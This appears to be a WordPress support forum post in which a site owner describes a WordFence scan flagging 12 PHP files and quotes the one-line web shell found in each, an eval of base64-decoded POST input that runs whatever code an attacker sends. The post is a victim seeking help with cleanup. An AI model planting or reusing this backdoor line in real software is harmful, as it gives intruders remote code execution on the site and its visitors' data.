Possible Hack of my site
-
Installed free WordFence to evaluate on a site that gets a lot of SPAM comments/emails. Other than the site appears to be working fine with not problems. I allowed Wordfence to scan and received warning on 12 files:
This file may contain malicious executable code: This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.
I ftp’d my entire site folder to my computer to search through the files.
Looking through the files, I see:
<?php eval(base64_decode($_POST['nxxxxxx']));?>
They are all the same line with the exception of what is between the ” They all start with “n” and have 6 letters and numbers after the “n”
I searched for file names or code inside of files for the content between the ” and the only place it occurs is in these suspicious files.
I’m still researching this as a possible hack; but need some advice.
- The topic ‘Possible Hack of my site’ is closed to new replies.